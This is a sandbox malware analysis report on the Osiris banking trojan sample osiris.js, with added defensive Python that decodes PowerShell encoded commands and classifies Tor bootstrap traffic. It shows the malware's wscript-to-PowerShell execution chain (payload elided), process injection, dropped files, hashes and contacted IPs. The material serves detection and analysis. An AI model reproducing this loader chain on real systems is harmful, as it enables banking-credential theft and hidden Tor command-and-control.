Malware Analysis Report

2025-01-22 13:34

Sample ID  210305-32cfx2va5a
Target     osiris.js
SHA256     11c8dc17d50eb9393ca4b9db2ebf6be0989017cbabf39de8d0520e474ad40eb4
Tags       osiris banker botnet spyware
Score      10/10

Table of Contents

Analysis Overview
MITRE ATT&CK
    Enterprise Matrix V6
Analysis: static1
    Detonation Overview
    Signatures
Analysis: behavioral1
    Detonation Overview
    Command Line
    Signatures
    Processes
    Network
    Files
Analysis: behavioral2
    Detonation Overview
    Command Line
    Signatures
    Processes
    Network
    Files

Analysis Overview

Score   10/10
SHA256  11c8dc17d50eb9393ca4b9db2ebf6be0989017cbabf39de8d0520e474ad40eb4

Threat Level: Known bad

The file osiris.js was found to be: Known bad.

Malicious Activity Summary

Tags: osiris banker botnet spyware

Osiris
Executes dropped EXE
Reads user/profile data of web browsers
Uses Tor communications
Looks up external IP address via web service
Suspicious use of SetThreadContext
Enumerates physical storage devices
Suspicious behavior: CmdExeWriteProcessMemorySpam
Suspicious use of SetWindowsHookEx
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Modifies Internet Explorer settings

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported  2021-03-05 11:49

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted         2021-03-05 11:49
Reported          2021-03-05 11:51
Platform          win7v20201028
Max time kernel   123s
Max time network  11s

Command Line

wscript.exe C:\Users\Admin\AppData\Local\Temp\osiris.js

Signatures

Enumerates physical storage devices

Suspicious behavior: CmdExeWriteProcessMemorySpam

Description  Indicator  Process                                                    Target
N/A          N/A        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  N/A

Suspicious behavior: EnumeratesProcesses

Description  Indicator  Process                                                    Target
N/A          N/A        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  N/A
N/A          N/A        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  N/A

Suspicious use of AdjustPrivilegeToken

Description              Indicator  Process                                                    Target
Token: SeDebugPrivilege  N/A        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  N/A

Processes

C:\Windows\system32\wscript.exe
    wscript.exe C:\Users\Admin\AppData\Local\Temp\osiris.js

C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /c C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -En "<encoded command elided>"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -En "<encoded command elided>"
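The -En on the command line above is an abbreviation: powershell.exe accepts any unambiguous prefix of -EncodedCommand (so -e, -en, -enc and -ec all work, which is why string matches on "-EncodedCommand" miss most real samples), and the argument is base64 of the UTF-16LE script text, not of ASCII. The following Python is an added example, not part of the sandbox output: it resolves the abbreviated switch, pulls the blob out of a cmd.exe /c wrapper shaped like the one shown, and decodes it. The switch table is modelled on powershell.exe's own parser and is an assumption of this example (it is deliberately partial), and the encoded blob is a constructed stand-in, since the report does not reproduce the real one.

```python
import base64
import binascii
import re

# Accepted switch spellings, modelled on powershell.exe's command-line parser
# (an assumption of this example, and a partial table). A token matches an entry
# when it is at least the shortest form and is a prefix of the accepted name.
# Order matters: "-e" resolves to EncodedCommand, "-ex" to ExecutionPolicy.
_SWITCHES = [
    # accepted name,    shortest form, canonical parameter
    ("encodedcommand",  "e",           "encodedcommand"),
    ("ec",              "e",           "encodedcommand"),
    ("executionpolicy", "ex",          "executionpolicy"),
    ("noprofile",       "nop",         "noprofile"),
    ("nologo",          "nol",         "nologo"),
    ("noninteractive",  "noni",        "noninteractive"),
    ("noexit",          "noe",         "noexit"),
    ("windowstyle",     "w",           "windowstyle"),
    ("command",         "c",           "command"),
    ("file",            "f",           "file"),
]


def resolve_switch(token):
    """Map an abbreviated switch such as -En or /ec to its canonical name, or None."""
    if not token or token[0] not in "-/":
        return None
    key = token[1:].lower()
    for accepted, shortest, canonical in _SWITCHES:
        if key.startswith(shortest) and accepted.startswith(key):
            return canonical
    return None


def _tokens(cmdline):
    # Split on whitespace but keep double-quoted runs together, then drop the quotes.
    return [t.strip('"') for t in re.findall(r'"[^"]*"|\S+', cmdline)]


def decode_encoded_command(blob):
    """-EncodedCommand carries base64 of the UTF-16LE script text."""
    blob = blob.strip()                     # the report shows a trailing space inside the quotes
    blob += "=" * (-len(blob) % 4)          # tolerate stripped padding
    return base64.b64decode(blob).decode("utf-16-le")


def extract_encoded_command(cmdline):
    """Return the decoded script from a powershell.exe command line, or None."""
    toks = _tokens(cmdline)
    # Only interpret switches after the powershell image: cmd.exe's /c is not ours.
    start = next((i for i, t in enumerate(toks)
                  if t.lower().endswith(("powershell.exe", "pwsh.exe"))), None)
    if start is None:
        return None
    for i in range(start + 1, len(toks) - 1):
        if resolve_switch(toks[i]) == "encodedcommand":
            try:
                return decode_encoded_command(toks[i + 1])
            except (binascii.Error, UnicodeDecodeError):
                return None
    return None


def encode_command(script):
    """Inverse of the decoder; used only to build the constructed sample below."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed stand-in: the real blob is not reproduced in the report above.
SAMPLE_SCRIPT = "Write-Output 'constructed sample payload'"
SAMPLE_CMDLINE = ('"C:\\Windows\\System32\\cmd.exe" /c '
                  'C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe '
                  '-En "' + encode_command(SAMPLE_SCRIPT) + ' "')

if __name__ == "__main__":
    print(extract_encoded_command(SAMPLE_CMDLINE))
```

Decode, do not run: the decoded text is usually a second stage that fetches or inflates more code. Note also that the 64-bit wscript.exe goes out of its way to launch the 32-bit PowerShell from SysWOW64; that choice is itself worth alerting on, since an in-memory payload has to match the bitness of the process it is later injected into.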

Network

N/A

Files

memory/1376-2-0x0000000000000000-mapping.dmp
memory/1108-3-0x0000000002FB0000-0x0000000002FB4000-memory.dmp
memory/1592-4-0x0000000000000000-mapping.dmp
memory/1592-5-0x00000000760D1000-0x00000000760D3000-memory.dmp
memory/1592-6-0x0000000073E00000-0x00000000744EE000-memory.dmp
memory/1592-7-0x0000000000F40000-0x0000000000F41000-memory.dmp
memory/1592-8-0x00000000049D0000-0x00000000049D1000-memory.dmp
memory/1592-9-0x0000000004990000-0x0000000004991000-memory.dmp
memory/1592-10-0x0000000004992000-0x0000000004993000-memory.dmp
memory/1592-11-0x0000000002580000-0x0000000002581000-memory.dmp
memory/1592-12-0x0000000002750000-0x0000000002751000-memory.dmp
memory/1592-15-0x00000000056A0000-0x00000000056A1000-memory.dmp
memory/1592-20-0x00000000056F0000-0x00000000056F1000-memory.dmp
memory/1592-21-0x00000000062A0000-0x00000000062A1000-memory.dmp
memory/1592-28-0x0000000006210000-0x0000000006211000-memory.dmp
memory/1592-29-0x000000007EF30000-0x000000007EF31000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted         2021-03-05 11:49
Reported          2021-03-05 11:51
Platform          win10v20201028
Max time kernel   150s
Max time network  149s

Command Line

wscript.exe C:\Users\Admin\AppData\Local\Temp\osiris.js

Signatures

Osiris

Tags: banker botnet osiris

Executes dropped EXE

Description  Indicator  Process                                           Target
N/A          N/A        C:\Users\Admin\AppData\Roaming\Admin.exe          N/A
N/A          N/A        C:\Users\Admin\AppData\Local\Temp\GetX64BTIT.exe  N/A

Reads user/profile data of web browsers

Tags: spyware

Looks up external IP address via web service

Description  Indicator      Process  Target
N/A          api.ipify.org  N/A      N/A
N/A          api.ipify.org  N/A      N/A

Uses Tor communications

Suspicious use of SetThreadContext

Description                          Indicator  Process                                                    Target
PID 3756 set thread context of 2360  N/A        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  C:\Users\Admin\AppData\Roaming\Admin.exe

Enumerates physical storage devices

Modifies Internet Explorer settings

Tags: adware spyware

Description  Indicator                                                                                                                 Process                                   Target
Key created  \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Internet Explorer\IntelliForms\Storage2  C:\Users\Admin\AppData\Roaming\Admin.exe  N/A

Suspicious behavior: EnumeratesProcesses

Description  Indicator  Process                                                    Target  Count (identical rows)
N/A          N/A        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  N/A     3
N/A          N/A        C:\Users\Admin\AppData\Roaming\Admin.exe                   N/A     61

Suspicious use of AdjustPrivilegeToken

Description              Indicator  Process                                                    Target
Token: SeDebugPrivilege  N/A        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  N/A

Suspicious use of SetWindowsHookEx

Description  Indicator  Process                                   Target
N/A          N/A        C:\Users\Admin\AppData\Roaming\Admin.exe  N/A

Suspicious use of WriteProcessMemory

Description                       Indicator  Process                                                    Target                                                     Count (identical rows)
PID 3992 wrote to memory of 196   N/A        C:\Windows\system32\wscript.exe                            C:\Windows\System32\cmd.exe                                2
PID 196 wrote to memory of 3756   N/A        C:\Windows\System32\cmd.exe                                C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  3
PID 3756 wrote to memory of 2360  N/A        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  C:\Users\Admin\AppData\Roaming\Admin.exe                   10
PID 2360 wrote to memory of 2476  N/A        C:\Users\Admin\AppData\Roaming\Admin.exe                   C:\Users\Admin\AppData\Local\Temp\GetX64BTIT.exe           2

Processes

C:\Windows\system32\wscript.exe
    wscript.exe C:\Users\Admin\AppData\Local\Temp\osiris.js

C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /c C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -En "<encoded command elided>"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -En "<encoded command elided>"

C:\Users\Admin\AppData\Roaming\Admin.exe
    "C:\Users\Admin\AppData\Roaming\Admin.exe"

C:\Users\Admin\AppData\Local\Temp\GetX64BTIT.exe
    "C:\Users\Admin\AppData\Local\Temp\GetX64BTIT.exe"

Network

Country  Destination          Domain           Proto
N/A      128.31.0.34:9131     128.31.0.34      tcp
N/A      8.8.8.8:53           api.ipify.org    udp
N/A      23.21.126.66:443     api.ipify.org    tcp
N/A      31.220.3.149:80      31.220.3.149     tcp
N/A      109.248.149.169:443  N/A              tcp
N/A      8.8.8.8:53           time-a.nist.gov  udp
N/A      129.6.15.28:13       time-a.nist.gov  tcp
N/A      172.98.193.62:80     172.98.193.62    tcp
N/A      195.154.235.190:443  195.154.235.190  tcp
N/A      185.67.82.114:80     185.67.82.114    tcp
N/A      139.99.238.17:80     139.99.238.17    tcp
N/A      135.148.32.176:80    135.148.32.176   tcp
N/A      212.227.204.82:443   N/A              tcp
N/A      104.152.189.214:80   104.152.189.214  tcp
N/A      199.249.230.168:80   199.249.230.168  tcp
N/A      107.189.10.237:80    107.189.10.237   tcp
N/A      5.83.45.131:443      N/A              tcp
N/A      127.0.0.1:32767      N/A              tcp
N/A      87.92.222.112:80     87.92.222.112    tcp
N/A      185.220.102.244:80   185.220.102.244  tcp
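The table above has a structure that the "Uses Tor communications" signature is summarising: the very first connection goes to 128.31.0.34 on port 9131, which is the DirPort of moria1, one of the directory authorities compiled into every Tor client, and it is followed by fourteen connections to bare IP addresses on ports 80 and 443 with no DNS lookup before any of them. A Tor client fetches the consensus from an authority and then builds circuits to relays by IP, and relays commonly run their ORPort on 443 or 80, so that shape is what a fresh Tor bootstrap looks like from the outside; the actual command-and-control endpoint is behind the circuit and does not appear here. The remaining rows are support traffic: a daytime-protocol (TCP/13) time check against NIST, an external-IP lookup via api.ipify.org, and a loopback connection on 127.0.0.1:32767 that the report does not attribute to a listener. The following Python is an added example, not part of the sandbox output: it parses the flattened table, including the rows that have no Domain value, and tags each destination with the heuristic just described. The directory-authority list is deliberately limited to the one entry this report hits; take the current, complete list from auth_dirs.inc in the Tor source tree rather than from this example.

```python
import ipaddress
from collections import Counter

# The behavioral2 Network table as constructed input, one row per line in the
# report's own column order (Country Destination Domain Proto); some rows have
# no Domain value at all.
NETWORK_TABLE = """\
N/A 128.31.0.34:9131 128.31.0.34 tcp
N/A 8.8.8.8:53 api.ipify.org udp
N/A 23.21.126.66:443 api.ipify.org tcp
N/A 31.220.3.149:80 31.220.3.149 tcp
N/A 109.248.149.169:443 tcp
N/A 8.8.8.8:53 time-a.nist.gov udp
N/A 129.6.15.28:13 time-a.nist.gov tcp
N/A 172.98.193.62:80 172.98.193.62 tcp
N/A 195.154.235.190:443 195.154.235.190 tcp
N/A 185.67.82.114:80 185.67.82.114 tcp
N/A 139.99.238.17:80 139.99.238.17 tcp
N/A 135.148.32.176:80 135.148.32.176 tcp
N/A 212.227.204.82:443 tcp
N/A 104.152.189.214:80 104.152.189.214 tcp
N/A 199.249.230.168:80 199.249.230.168 tcp
N/A 107.189.10.237:80 107.189.10.237 tcp
N/A 5.83.45.131:443 tcp
N/A 127.0.0.1:32767 tcp
N/A 87.92.222.112:80 87.92.222.112 tcp
N/A 185.220.102.244:80 185.220.102.244 tcp
"""

# Tor directory authorities are compiled into the client, so a cold Tor start
# reaches one of them by IP before any relay. Only the authority this report
# contacts is listed (moria1, DirPort 9131); the full, current list lives in
# auth_dirs.inc in the Tor source tree, not in this example.
TOR_DIR_AUTHORITIES = {"128.31.0.34": "moria1"}


def parse_rows(text):
    """Flattened 'Country Destination Domain Proto' rows; Domain may be absent."""
    rows = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) < 3:
            continue
        host, port = parts[1].rsplit(":", 1)
        rows.append({
            "country": parts[0],
            "ip": host,
            "port": int(port),
            "domain": parts[2] if len(parts) == 4 else None,
            "proto": parts[-1],
        })
    return rows


def classify(row):
    """(category, detail) for one destination; the order of the checks matters."""
    ip = ipaddress.ip_address(row["ip"])
    name = (row["domain"] or "").lower()
    if row["port"] == 53 and row["proto"] == "udp":
        return "dns-query", name                      # Domain here is the queried name
    if ip.is_loopback:
        return "loopback", f"{row['ip']}:{row['port']}"
    if row["ip"] in TOR_DIR_AUTHORITIES:
        return "tor-directory-authority", TOR_DIR_AUTHORITIES[row["ip"]]
    if name.endswith("ipify.org"):
        return "external-ip-lookup", name
    if row["port"] == 13 or name.endswith("nist.gov"):
        return "time-check", name or row["ip"]        # TCP/13 is the daytime protocol
    if name in ("", row["ip"]) and row["port"] in (80, 443):
        # No name resolved, plain IP on a web port: Tor relay ORPorts look like this,
        # but so does any hard-coded IP, so this is a lead and not a verdict.
        return "direct-ip-no-dns", f"{row['ip']}:{row['port']}"
    return "other", f"{row['ip']}:{row['port']}"


def summarize(rows):
    return Counter(classify(r)[0] for r in rows)


if __name__ == "__main__":
    rows = parse_rows(NETWORK_TABLE)
    for r in rows:
        print(f"{r['ip']:>16}:{r['port']:<5} {r['proto']}  {classify(r)}")
    print(dict(summarize(rows)))
```

A network window of 149 seconds is short; bootstrap traffic dominates and the first real Tor request may not have fired before the run ended, so an empty-looking Tor session in a sandbox is not evidence that the sample has no command-and-control.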

Files

memory/196-3-0x0000000000000000-mapping.dmp
memory/3756-4-0x0000000000000000-mapping.dmp
memory/3756-5-0x00000000739A0000-0x000000007408E000-memory.dmp
memory/3756-6-0x0000000004D70000-0x0000000004D71000-memory.dmp
memory/3756-7-0x0000000007740000-0x0000000007741000-memory.dmp
memory/3756-8-0x0000000007100000-0x0000000007101000-memory.dmp
memory/3756-9-0x0000000007102000-0x0000000007103000-memory.dmp
memory/3756-10-0x0000000007360000-0x0000000007361000-memory.dmp
memory/3756-11-0x0000000007400000-0x0000000007401000-memory.dmp
memory/3756-12-0x0000000007470000-0x0000000007471000-memory.dmp
memory/3756-13-0x0000000007F50000-0x0000000007F51000-memory.dmp
memory/3756-14-0x0000000007DB0000-0x0000000007DB1000-memory.dmp
memory/3756-15-0x0000000008680000-0x0000000008681000-memory.dmp
memory/3756-16-0x0000000008500000-0x0000000008501000-memory.dmp
memory/3756-17-0x00000000095C0000-0x00000000095C1000-memory.dmp
memory/3756-18-0x0000000009280000-0x0000000009281000-memory.dmp
memory/3756-19-0x00000000092E0000-0x00000000092E1000-memory.dmp
memory/3756-20-0x0000000009B60000-0x0000000009B61000-memory.dmp
memory/3756-21-0x0000000009670000-0x0000000009672000-memory.dmp
memory/3756-22-0x00000000097B0000-0x0000000009923000-memory.dmp
memory/2360-23-0x0000000000400000-0x0000000000456000-memory.dmp
memory/2360-24-0x0000000000401698-mapping.dmp

C:\Users\Admin\AppData\Roaming\Admin.exe
    MD5     4db1ee663bd9f021da04edca144f4bd7
    SHA1    709d318281ceabef246af0107b1db12f237b793a
    SHA256  3002d2fc90595dd4688518b300323aaf26d4ae09cb33b2b580cbec41b43d8eb6
    SHA512  ec3b1615e1751fad8cf4f6b6cf8739d972ab7aa4d23a84167e159f15b4842bc3ec09bb4b4daf31570e0d88d466e0a4c5eac16f97169dfb020c5758ce568ce565

memory/2360-27-0x0000000000400000-0x0000000000456000-memory.dmp
memory/2360-28-0x0000000000530000-0x00000000005CF000-memory.dmp
memory/2476-29-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\GetX64BTIT.exe
    MD5     b4cd27f2b37665f51eb9fe685ec1d373
    SHA1    7f08febf0fdb7fc9f8bf35a10fb11e7de431abe0
    SHA256  91f1023142b7babf6ff75dad984c2a35bde61dc9e61f45483f4b65008576d581
    SHA512  e025f65224d78f5fd0abebe281ac0d44a385b2641e367cf39eed6aefada20a112ac47f94d7febc4424f1db6a6947bac16ff83ef93a8d745b3cddfdbe64c49a1e

C:\Users\Admin\AppData\Local\Temp\x64btit.txt
    MD5     4b669744a47d57491bafdc34594d1d83
    SHA1    e59fcf8262b67b5481c8e8e182ba675a005435cc
    SHA256  f2e34421ee8298153c1f03e3fa44d1c83e5ad57f3cfd3fa6f6456bbb1517deb3
    SHA512  dc935a4f1bf9ea32d2c8ac9481fb9ef818b15addc02bb45e15470e30a8ed3caeb57fd233be2a0f7d152937cfb1e59461c0d178f14aacd8636a40b8fe9b97169a